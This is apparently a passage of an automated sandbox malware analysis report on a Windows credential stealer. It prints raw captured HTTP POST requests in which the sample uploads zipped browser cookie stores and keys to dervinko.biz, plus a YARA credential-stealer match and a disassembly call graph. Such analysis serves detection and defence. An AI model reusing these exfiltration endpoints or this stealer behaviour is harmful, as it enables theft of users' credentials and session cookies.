                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 6c 64 58 31 56 58 57 56 52 66 58 46 74 69 57 31 52 55 58 46 70 63 55 56 42 61 61 6c 70 5a 57 31 39 53 58 78 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 47 42 68 59 7a 46 78 49 54 49 45 55 5a 4f 42 45 55 47 52 64 4a 4f 53 41 59 46 52 49 52 46 42 74 65 56 68 45 36 47 42 64 58 56 6c 42 64 55 31 68 52 61 6c 52 57 57 46 4a 66 55 46 4a 59 55 57 4a 5a 57 31 64 65 56 6c 4a 48 56 56 31 74 53 46 35 63 51 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 61 47 77 30 53 45 58 63 4d 44 52 41 37 46 42 6b 58 45 6b 34 73 4d 68 55 53 45 52 52 43 50 52 49 54 49 42 67 56 45 68 4e 64 58 52 55 49 45 79 4a 57 58 46 70 64 55 56 74 54 58 6c 42 6a 55 6c 39 57 56 46 35 65 57 46 46 44 62 31 39 54 51 6c 6c 52 57 46 78 5a 51 32 39 63 56 78 41 64 50 68 6b 58 45 68 4d 67 47
                                                                                                                                                                                          Data Ascii: ldX1VXWVRfXFtiW1RUXFpcUVBaalpZW19SXxUeOSAYFRIRFBtZEAkgGkIGBhYzFxITIEUZOBEUGRdJOSAYFRIRFBteVhE6GBdXVlBdU1hRalRWWFJfUFJYUWJZW1deVlJHVV1tSF5cQRYVPRITIBgVEhNaGw0SEXcMDRA7FBkXEk4sMhUSERRCPRITIBgVEhNdXRUIEyJWXFpdUVtTXlBjUl9WVF5eWFFDb19TQllRWFxZQ29cVxAdPhkXEhMgG
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 61 57 6c 4a 70 58 31 39 63 57 6c 74 62 57 56 78 61 61 42 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 42 41 68 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 48 58 46 39 6a 57 31 68 64 57 31 64 55 55 6c 31 62 62 45 68 53 56 56 78 53 56 31 56 51 57 6d 46 49 58 6c 39 54 57 46 42 59 55 42 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 45 43 43 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 59 55 31 46 43 55 47 6c 65 52 56 56 54 56 6c 70 66 58 56 64 6b 53 46 39 58 56 31 56 51 52 31 31 61 61 56 39 46 56 6c 78 56 58 68 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 55 45 41 78 59 7a 46 78
                                                                                                                                                                                          Data Ascii: aWlJpX19cWltbWVxaaBoZOBEUGRcSEyJWFwgRFk4BAhEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtHXF9jW1hdW1dUUl1bbEhSVVxSV1VQWmFIXl9TWFBYUBEsMhUSERQZFxBdIgIVEEECCBU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNYU1FCUGleRVVTVlpfXVdkSF9XV1VQR11aaV9FVlxVXhUeOSAYFRIRFBtZEAkgGkUEAxYzFx


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.649701104.21.13.2034436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:19:57 UTC165OUTPOST /Up HTTP/1.1
                                                                                                                                                                                          Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: dervinko.biz
                                                                                                                                                                                          Content-Length: 341
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:19:57 UTC329OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 7c 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 38 39 37 33 37 62 35 37 2d 37 37 37 64 2d 34 30 30 64 2d 62 62 37 66 2d 37 37 62 37 65 30 32 34 39 32 30 65 2e 74 78 74 01 00 00 00 7d 8d b1 0a 02 31 10 44 7f 25 4c 9d 62 37 e4 a2 6e 29 b6 36 36 16 62 71 e4 a2 04 e4 22 1b d1 03 f1 df 5d 7f c0 72 de 3c 66 de 18 21 58 52 84 47 86 04 8f 2b e4 84 7d cd da 7a bb 3c dc 76 ec 35 bb 43 99 a7 a2 6e a7 f5 59 d4 d4 ff fd d9 e3 06 e1 15 0f 44 89 37 83 47 b3 93 63 9d a7 f6 ea 8e c9 06 ee 06 02 27 8a 6c 41 21 91 7e 5a 37 ca 61 4d 0b 53 88 f8 7c 01 50 4b 07 08 38 0e 72 85 77 00 00 00 00 00 00 00 9d 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 7c 7a a6 58 38 0e 72 85 77 00 00 00 9d 00 00 00 28 00 04 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: PK|zX(89737b57-777d-400d-bb7f-77b7e024920e.txt}1D%Lb7n)66bq"]r<f!XRG+}z<v5CnYD7Gc'lA!~Z7aMS|PK8rwPK|zX8rw(
                                                                                                                                                                                          2024-05-06 13:19:57 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                          Data Ascii: --------
                                                                                                                                                                                          2024-05-06 13:19:57 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:19:57 GMT
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9KQRHKt0FkrDTK4ekzPbhBR2CeVaX70i4tpMbFvCxJNXLTkfuYDt%2FbUrsb5Yh97z1gQptJ1L5wBSv9lWz0ayurpOOPWxJ%2BE7r%2FtWfCYNi0oiVblox4aFp69fToYYgwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 87f943d0e8c8a4f2-MIA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.649702104.21.13.2034436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:19:59 UTC168OUTPOST /Up/b HTTP/1.1
                                                                                                                                                                                          Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: dervinko.biz
                                                                                                                                                                                          Content-Length: 7753
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:19:59 UTC7741OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 38 2f 6b 65 79 01 00 00 00 01 20 00 df ff 0e b4 c5 60 bb 0c ed 85 60 10 de a9 0a ff d1 5d e6 fc 06 ae f8 f0 4c 07 6e c2 c2 20 6b f5 90 47 50 4b 07 08 63 48 45 8c 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 7f 6c 13 55 1c 00 f0 77 77 5b f7 8b ee 36 a5 4c 52 63 0e 86 ba 99 b1 3a 11 34 36 d1 75 50 b6 ba d2 6d a5 83 4d 34 e7 d1 be ad c7 da de ed ee dd 64 28 91 a1 89 33 33 c6 91 99 40 d4 a4 62 24 01 4d 46 1c 19 c9 16 13 06 0a ce 11 98 e8 44 fc 43 11 03 a8 21 64 26 68 f0 1f e2 bb ad 63 5d d7 c5 7f fc 63 7f 7c
                                                                                                                                                                                          Data Ascii: PK}zXb/c8/key ``]Ln kGPKcHE% PK}zXb/c8/0/Cookies1lUww[6LRc:46uPmM4d(33@b$MFDC!d&hc]c|
                                                                                                                                                                                          2024-05-06 13:19:59 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                          Data Ascii: --------
                                                                                                                                                                                          2024-05-06 13:19:59 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:19:59 GMT
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAM5s3U5JIpgEpwie5z0QTau%2BM4GXhCZ9Yld4ZASHHMa44eUCGxtulBEzoVfDKyoPXG4IAe9d%2FjpK9d2VuWGgVIMtKumJdKulOfGt66vHigznY3SgOhmWFhcCntN8Fk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 87f943db79b8287e-MIA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.649703104.21.13.2034436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:20:01 UTC169OUTPOST /Up/b HTTP/1.1
                                                                                                                                                                                          Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: dervinko.biz
                                                                                                                                                                                          Content-Length: 11660
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:20:01 UTC11648OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 39 2f 6b 65 79 01 00 00 00 01 20 00 df ff b3 b7 ef 54 5b af 12 0b 34 ad 96 8e 35 bc c1 b8 c3 80 8d 23 18 d3 f2 5b d7 55 38 9b f9 18 63 55 50 4b 07 08 0e 18 a7 1a 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 3d 6f d3 40 18 07 f0 73 9c 34 50 12 dc 0e 55 86 30 9c 5a 24 5a 29 bc 54 11 12 52 17 d2 d6 94 88 90 d0 90 a0 76 b2 ae ce b5 31 4d 6c f7 7c 2e cd d8 a1 03 4b 3f 01 5f 80 91 af c0 c6 04 1f 81 85 15 89 8d 11 5f 9a 36 a1 75 40 42 aa 84 aa ff 4f 72 62 df 73 39 bf e4 c9 29 7e fc 72 bd e2 48 4e b7 3d d1 65 92
                                                                                                                                                                                          Data Ascii: PK}zXb/c9/key T[45#[U8cUPK% PK}zXb/c9/0/Cookies1=o@s4PU0Z$Z)TRv1Ml|.K?__6u@BOrbs9)~rHN=e
                                                                                                                                                                                          2024-05-06 13:20:01 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                          Data Ascii: --------
                                                                                                                                                                                          2024-05-06 13:20:01 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:20:01 GMT
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjzaPr6UjOXZinlS3kIOX0AVNj3zG%2FpOYVpX9Aiu5yiKeWb9MWahhc3MqS5Ah7%2FLGr6BdPAzOGPlQiIFFROlqVgqrZwjzCeKIgwWeFF8t6dIlRx%2F4WzcVpAYuaYjcLE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 87f943e739243340-MIA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.649704104.21.13.2034436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:20:02 UTC168OUTPOST /Up/b HTTP/1.1
                                                                                                                                                                                          Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: dervinko.biz
                                                                                                                                                                                          Content-Length: 9194
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:20:02 UTC9182OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 80 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 15 00 04 00 62 2f 67 31 2f 30 2f 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 01 00 00 00 ed d2 4f 4f d4 40 14 00 f0 b2 18 35 46 cf 5e 27 e1 20 24 1b a3 31 de 5d b0 2a 71 01 d9 5d 12 39 91 b2 54 a9 2e 5b 68 bb 82 26 04 12 13 bf 97 df c0 6f c2 d5 a3 e5 af ab 12 ce 26 fc 7e c9 4c de cc 6b a6 af af d3 5d 6e 67 55 1a de e5 c5 56 52 85 27 d1 61 d4 68 44 cf 42 88 a2 68 f2 6c 9c 9b a8 c7 8d bf d6 77 a3 ab 4d 46 0f 3f fc b8 77 f0 33 6a ec 1f 45 fb 47 07 df 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ff c3 d7 a5 89 5b f7 a7 a6 26 be a5 55 b2 3e 48 b7 f2 2f 6b fd 3c ff 98 a5 e5 58 d8 98 eb c4 ad 5e 1c 7a ad d9 76 1c c6 12 61 3a db 08 f3 8b
                                                                                                                                                                                          Data Ascii: PKzXb/g1/0/cookies.sqliteOO@5F^' $1]*q]9T.[h&o&~Lk]ngUVR'ahDBhlwMF?w3jEG#[&U>H/k<X^zva:
                                                                                                                                                                                          2024-05-06 13:20:02 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                          Data Ascii: --------
                                                                                                                                                                                          2024-05-06 13:20:03 UTC525INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:20:03 GMT
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emd7dqbvewEe7iwJU9f%2FLM3516Fhbq5EBbQpu8Z%2BO0wLZAlF9AfKcOEmWo3ZT3FKkMJfsj1h%2FIDm35BQuXCcGC07TRYTRDoSEZTGIkqEWhM%2FgT3tXyVEXuqmv8%2B5upM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 87f943f2493da662-MIA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:15:19:53
                                                                                                                                                                                          Start date:06/05/2024
                                                                                                                                                                                          Path:C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Gj8P0mbklo.exe"
                                                                                                                                                                                          Imagebase:0x350000
                                                                                                                                                                                          File size:362'496 bytes
                                                                                                                                                                                          MD5 hash:BAD3FA5127EFCC9C678C5D71FCE0D0B2
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:56.8%
                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                            Total number of Limit Nodes:33
                                                                                                                                                                                            execution_graph 38876 357a4e 38924 356f10 _Yarn __CreateFrameInfo error_info_injector 38876->38924 38877 37b1dd 39 API calls __FrameHandler3::FrameUnwindToState 38877->38924 38878 35f7b0 41 API calls 38878->38924 38879 357c0b GetFileAttributesA 38879->38924 38880 35e940 41 API calls 38880->38924 38881 3585f9 GetFileAttributesA 38881->38924 38882 356070 41 API calls 38882->38924 38883 360fc0 41 API calls 38883->38924 38884 3591e1 GetFileAttributesA 38884->38924 38885 35f8d0 41 API calls 38885->38924 38886 356f10 96 API calls 38886->38924 38887 35f970 41 API calls 38887->38924 38888 356f3b _Yarn 38890 35ff80 41 API calls 38890->38924 38891 3595cf error_info_injector 38896 374a11 CatchGuardHandler 5 API calls 38891->38896 38892 35f990 96 API calls 38892->38924 38893 35f9e0 96 API calls 38893->38924 38894 35edc0 39 API calls 38894->38924 38895 35e730 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38895->38924 38899 3595e6 38896->38899 38897 356fa7 38897->38888 38901 374c1c std::_Facet_Register 41 API calls 38897->38901 38900 374c1c std::_Facet_Register 41 API calls 38900->38924 38901->38888 38902 35ee10 41 API calls 38902->38924 38904 35fad0 96 API calls 38904->38924 38905 357265 lstrlenA 38905->38924 38906 357949 error_info_injector 38909 374a11 CatchGuardHandler 5 API calls 38906->38909 38907 380fd8 39 API calls 38907->38924 38910 357960 38909->38910 38911 3572b1 GetProcessHeap HeapAlloc 38911->38924 38912 35f110 41 API calls 38912->38924 38913 357577 error_info_injector 38914 374a11 CatchGuardHandler 5 API calls 38913->38914 38916 357591 38914->38916 38915 35734f GetProcessHeap HeapFree 38915->38924 38917 35ecd0 41 API calls 38917->38924 38918 357349 CryptUnprotectData 38918->38915 38918->38924 38919 373c10 96 API calls 38919->38924 38920 355340 46 API calls 38920->38924 38921 355ce0 6 API calls 38921->38924 38922 3558c0 20 API calls 38923 35786c GetProcessHeap HeapFree 38922->38923 38923->38924 38924->38876 38924->38877 38924->38878 38924->38879 38924->38880 38924->38881 38924->38882 38924->38883 38924->38884 38924->38885 38924->38886 38924->38887 38924->38888 38924->38890 38924->38891 38924->38892 38924->38893 38924->38894 38924->38895 38924->38897 38924->38900 38924->38902 38924->38904 38924->38905 38924->38906 38924->38907 38924->38911 38924->38912 38924->38913 38924->38915 38924->38917 38924->38918 38924->38919 38924->38920 38924->38921 38924->38922 38925 3558c0 20 API calls 38924->38925 38926 356060 41 API calls CatchGuardHandler 38924->38926 38927 355fc0 41 API calls 3 library calls 38924->38927 38928 360220 41 API calls Concurrency::cancel_current_task 38924->38928 38929 3664d0 41 API calls 4 library calls 38924->38929 38925->38924 38926->38924 38927->38924 38929->38924 37879 3648b3 38008 366fc0 37879->38008 37881 3648c4 37882 3648d2 37881->37882 38027 368f50 41 API calls 5 library calls 37881->38027 38028 3619f0 44 API calls CatchGuardHandler 37882->38028 37885 3648f0 37886 364901 37885->37886 37956 3648f8 37885->37956 37887 3651ca 37886->37887 37888 36490a 37886->37888 37890 356f10 96 API calls 37887->37890 38029 366610 41 API calls std::_Facet_Register 37888->38029 37892 3651f2 37890->37892 37891 36491c 38030 3619f0 44 API calls CatchGuardHandler 37891->38030 38041 3612d0 96 API calls 2 library calls 37892->38041 37896 365205 38042 364590 96 API calls 3 library calls 37896->38042 37897 364927 37900 364933 37897->37900 37901 36511f 37897->37901 37898 365626 37902 374a11 CatchGuardHandler 5 API calls 37898->37902 38031 361d70 41 API calls 37900->38031 37906 356f10 96 API calls 37901->37906 37905 36563a 37902->37905 37903 36522a 38043 3617f0 46 API calls CatchGuardHandler 37903->38043 37910 365147 37906->37910 37908 3619f0 44 API calls 37908->37956 37909 364949 38032 3619f0 44 API calls CatchGuardHandler 37909->38032 38037 3612d0 96 API calls 2 library calls 37910->38037 37911 36523d 37915 3657b5 37911->37915 37916 36524b 37911->37916 37914 36515d 38038 364590 96 API calls 3 library calls 37914->38038 38061 37b1dd 39 API calls __CreateFrameInfo 37915->38061 37921 35edc0 39 API calls 37916->37921 37917 3650d2 38033 3619f0 44 API calls CatchGuardHandler 37917->38033 37918 3648a0 37935 356f10 96 API calls 37918->37935 37928 365257 37921->37928 37922 3653bb 37925 356f10 96 API calls 37922->37925 37923 365300 37929 356f10 96 API calls 37923->37929 37931 3653e3 37925->37931 37926 365182 38039 3617f0 46 API calls CatchGuardHandler 37926->38039 37927 3650da 37933 3650e6 37927->37933 37934 3654e8 37927->37934 38044 356470 14 API calls ___std_exception_destroy 37928->38044 37937 365328 37929->37937 38049 3612d0 96 API calls 2 library calls 37931->38049 38034 366610 41 API calls std::_Facet_Register 37933->38034 37946 356f10 96 API calls 37934->37946 37941 365766 37935->37941 38045 3612d0 96 API calls 2 library calls 37937->38045 38058 3612d0 96 API calls 2 library calls 37941->38058 37942 365263 37954 35edc0 39 API calls 37942->37954 37944 3657bf 38062 37b1dd 39 API calls __CreateFrameInfo 37944->38062 37945 365192 37950 3657b0 37945->37950 37951 3651a0 37945->37951 37955 365510 37946->37955 37947 36533e 38046 364590 96 API calls 3 library calls 37947->38046 37949 3653f9 38050 364590 96 API calls 3 library calls 37949->38050 38060 37b1dd 39 API calls __CreateFrameInfo 37950->38060 37965 35edc0 39 API calls 37951->37965 37952 3650f8 38035 3619f0 44 API calls CatchGuardHandler 37952->38035 37961 3651c1 37954->37961 38055 3612d0 96 API calls 2 library calls 37955->38055 37956->37908 37956->37909 37956->37917 37956->37922 37956->37923 37962 3666e0 41 API calls 37956->37962 38006 3653b6 37956->38006 37959 36577c 38059 364590 96 API calls 3 library calls 37959->38059 37972 35edc0 39 API calls 37961->37972 37962->37956 37968 3651a9 37965->37968 37967 365363 38047 3617f0 46 API calls CatchGuardHandler 37967->38047 38040 356470 14 API calls ___std_exception_destroy 37968->38040 37969 365103 37973 36510f 37969->37973 37974 36542d 37969->37974 37971 365526 38056 364590 96 API calls 3 library calls 37971->38056 37972->38006 38036 3619f0 44 API calls CatchGuardHandler 37973->38036 37979 356f10 96 API calls 37974->37979 37975 3657a1 37983 365455 37979->37983 37980 3651b5 37985 35edc0 39 API calls 37980->37985 37982 365490 38053 3617f0 46 API calls CatchGuardHandler 37982->38053 38051 3612d0 96 API calls 2 library calls 37983->38051 37984 365376 37984->37944 37986 365384 37984->37986 37985->37961 37991 35edc0 39 API calls 37986->37991 37989 36546b 38052 364590 96 API calls 3 library calls 37989->38052 37990 3654a3 37990->37944 37992 3654b1 37990->37992 37993 365395 37991->37993 37995 35edc0 39 API calls 37992->37995 38048 356470 14 API calls ___std_exception_destroy 37993->38048 37997 3654c2 37995->37997 38054 356470 14 API calls ___std_exception_destroy 37997->38054 37998 3653a1 38000 35edc0 39 API calls 37998->38000 38002 3653ad 38000->38002 38001 3654ce 38003 35edc0 39 API calls 38001->38003 38004 35edc0 39 API calls 38002->38004 38005 3654da 38003->38005 38004->38006 38007 35edc0 39 API calls 38005->38007 38057 361990 39 API calls error_info_injector 38006->38057 38007->38006 38009 366fd6 38008->38009 38010 36702c 38008->38010 38011 35ef10 39 API calls 38009->38011 38012 367037 38010->38012 38013 36708d 38010->38013 38015 366fe6 38011->38015 38016 367042 38012->38016 38017 36706a 38012->38017 38014 35ef10 39 API calls 38013->38014 38018 36709d 38014->38018 38019 35f110 41 API calls 38015->38019 38020 35ef10 39 API calls 38016->38020 38063 369530 41 API calls 38017->38063 38023 35f110 41 API calls 38018->38023 38024 367021 38019->38024 38025 36704e 38020->38025 38022 367075 38022->37881 38026 3670d9 38023->38026 38024->37881 38025->37881 38026->37881 38027->37882 38028->37885 38029->37891 38030->37897 38031->37909 38032->37918 38033->37927 38034->37952 38035->37969 38036->37918 38037->37914 38038->37926 38039->37945 38040->37980 38041->37896 38042->37903 38043->37911 38044->37942 38045->37947 38046->37967 38047->37984 38048->37998 38049->37949 38050->37967 38051->37989 38052->37982 38053->37990 38054->38001 38055->37971 38056->37982 38057->37898 38058->37959 38059->37975 38063->38022 38064 36c490 38065 356f10 96 API calls 38064->38065 38066 36c4d7 38065->38066 38067 35e940 41 API calls 38066->38067 38068 36c4de 38067->38068 38069 36d557 38068->38069 38070 36c508 38068->38070 38546 37b1dd 39 API calls __CreateFrameInfo 38069->38546 38072 356f10 96 API calls 38070->38072 38074 36c525 38072->38074 38073 36d55c 38075 380fd8 39 API calls 38073->38075 38076 374780 96 API calls 38074->38076 38077 36d561 38075->38077 38083 36c542 error_info_injector 38076->38083 38547 37b1dd 39 API calls __CreateFrameInfo 38077->38547 38079 36d566 38080 380fd8 39 API calls 38079->38080 38084 36d593 38080->38084 38081 356f10 96 API calls 38082 36c5c3 38081->38082 38085 35e940 41 API calls 38082->38085 38083->38073 38083->38081 38086 36c5ca 38085->38086 38087 374650 96 API calls 38086->38087 38088 36c5d8 38087->38088 38089 356f10 96 API calls 38088->38089 38090 36c5ff 38089->38090 38091 35e940 41 API calls 38090->38091 38092 36c606 38091->38092 38092->38077 38093 356f10 96 API calls 38092->38093 38094 36c64d error_info_injector 38093->38094 38094->38079 38095 356f10 96 API calls 38094->38095 38096 36c6f0 38095->38096 38097 35e940 41 API calls 38096->38097 38098 36c6f7 38097->38098 38099 374650 96 API calls 38098->38099 38100 36c705 38099->38100 38101 356f10 96 API calls 38100->38101 38102 36c73b GetNativeSystemInfo 38101->38102 38103 36c775 38102->38103 38104 36c788 KiUserCallbackDispatcher 38103->38104 38543 36d9a0 41 API calls 38103->38543 38107 356070 41 API calls 38104->38107 38108 36c79f 38107->38108 38109 356070 41 API calls 38108->38109 38110 36c7ba 38109->38110 38111 35ff80 41 API calls 38110->38111 38112 36c7cb 38110->38112 38111->38112 38113 360fc0 41 API calls 38112->38113 38114 36c83c error_info_injector 38113->38114 38115 35ef10 39 API calls 38114->38115 38116 36c90a 38115->38116 38260 36bfe0 38116->38260 38119 35f110 41 API calls 38120 36c93a 38119->38120 38121 374c1c std::_Facet_Register 41 API calls 38120->38121 38122 36c941 38121->38122 38123 356f10 96 API calls 38122->38123 38124 36c99d 38123->38124 38125 35e940 41 API calls 38124->38125 38126 36c9a9 38125->38126 38127 35f110 41 API calls 38126->38127 38130 36c9e9 error_info_injector 38127->38130 38303 36b2d0 38130->38303 38131 35f110 41 API calls 38132 36ca57 38131->38132 38133 374c1c std::_Facet_Register 41 API calls 38132->38133 38134 36ca5e 38133->38134 38135 356f10 96 API calls 38134->38135 38136 36caba 38135->38136 38137 35e940 41 API calls 38136->38137 38138 36cac6 38137->38138 38139 35f110 41 API calls 38138->38139 38141 36cb06 error_info_injector 38139->38141 38140 35f110 41 API calls 38142 36cb5e 38140->38142 38141->38140 38143 374c1c std::_Facet_Register 41 API calls 38142->38143 38144 36cb65 38143->38144 38145 35ee10 41 API calls 38144->38145 38146 36cb79 38145->38146 38147 356f10 96 API calls 38146->38147 38148 36cb9e 38147->38148 38149 35e940 41 API calls 38148->38149 38150 36cbaa 38149->38150 38151 35f110 41 API calls 38150->38151 38152 36cbea 38151->38152 38153 35f110 41 API calls 38152->38153 38154 36cc06 38153->38154 38155 374c1c std::_Facet_Register 41 API calls 38154->38155 38156 36cc0d 38155->38156 38157 35ee10 41 API calls 38156->38157 38158 36cc21 38157->38158 38159 356f10 96 API calls 38158->38159 38160 36cc46 38159->38160 38161 35e940 41 API calls 38160->38161 38162 36cc52 38161->38162 38163 35f110 41 API calls 38162->38163 38164 36cc92 38163->38164 38329 36be50 38164->38329 38261 356f10 96 API calls 38260->38261 38262 36c020 38261->38262 38263 35e940 41 API calls 38262->38263 38264 36c027 38263->38264 38265 36c374 38264->38265 38266 36c04e 38264->38266 38549 37b1dd 39 API calls __CreateFrameInfo 38265->38549 38268 356f10 96 API calls 38266->38268 38270 36c06a 38268->38270 38269 36c379 38271 380fd8 39 API calls 38269->38271 38272 374780 96 API calls 38270->38272 38273 36c37e 38271->38273 38274 36c084 38272->38274 38550 37b1dd 39 API calls 